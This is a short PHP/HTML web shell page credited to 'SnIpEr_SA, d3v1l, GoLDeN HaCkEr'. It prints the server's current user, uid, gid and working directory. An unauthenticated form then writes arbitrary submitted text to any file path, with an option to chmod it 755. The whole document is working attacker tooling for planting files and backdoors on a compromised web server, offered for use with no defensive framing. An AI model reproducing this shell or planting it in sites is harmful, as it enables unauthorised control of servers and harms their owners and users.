<title>SnIpEr_SA Write Files &quot;fopen&quot; </title>
<body bgcolor="#DFDFDF">
<body>
<p align="center"><font face="Impact" size="6"><u><font color="#FF0000">W</font></u>rite
<u><font color="#FF0000">F</font></u>iles <u><font color="#FF0000">B</font></u>y
<u><font color="#FF0000">F</font></u>open</font></p>
<p align="center"><b><font face="Tahoma" size="2"><font color="#FF0000">(c)oded & Design By :</font>
SnIpEr_SA,d3v1l,GoLDeN HaCkEr</font></b></p>
        <? echo "<p align=center><font color=#008000>user=</font>".@get_current_user()." <font color=#008000>uid=</font>".@getmyuid()."<font color=#008000>gid=</font>".@getmygid()."<br>";?>
  <?  $dir = @getcwd();
    echo "<p align=center><font color=#008000>pwd:</font><font color=red> $dir</font></p>";?>
<p align="center"></td>
&nbsp;</p>
<form method='POST' enctype='multipart/form-data' >
<p align="center">
<textarea name="Write" cols="62" rows="10" wrar="off" style="color: #808080; border: 1px dotted #808080; background-color: #EBEBEB">
</textarea>
<br></p>
<p align="center">
<input type="text" name="Filename" value="<? $dir = @getcwd(); echo "$dir"; ?>" size="59" style="color: #808080; border: 1px dotted #808080; background-color: #EBEBEB"></p>
<p align="center"></p>
   <p align="center">
   chmod 755? <input type="checkbox" name="Chmood" value="Yes" /><br>
   <input type="submit" value="Write" style="color: #808080; border: 1px dotted #808080; background-color: #E8E8E8"></form></p>

<?php
//(c)oded by SnIpEr_SA


if(empty($_POST['Write'])){

} else {
$write =$_POST['Write'];
$write = stripslashes($write);


if(empty($_POST['Filename'])){

} else {
$filename =$_POST['Filename'];
$fp = fopen($filename, "w");
(fwrite($fp,  "$write"));
$ok = fclose($fp);
 }
 }
if($ok)
{
	if($_POST['Chmood'] == 'Yes') 
	{
	    chmod($filename, 0755);
	}
$size = filesize($filename)/1024;
$sizef = sprintf("%.2f", $size);
print "<center><div id=logostrip><font color=green face=tahoma size=3>Write complete - OK.
(size file-".$sizef."-)</font></div></center>";
}
else
{
print "<center><div id=logostrip><font color=red face=tahoma size=1>Something is wrong. Download - IS NOT
OK<p>make sure you'r permission user or dir have 777 permission</p></div></center>";
}

    ?>



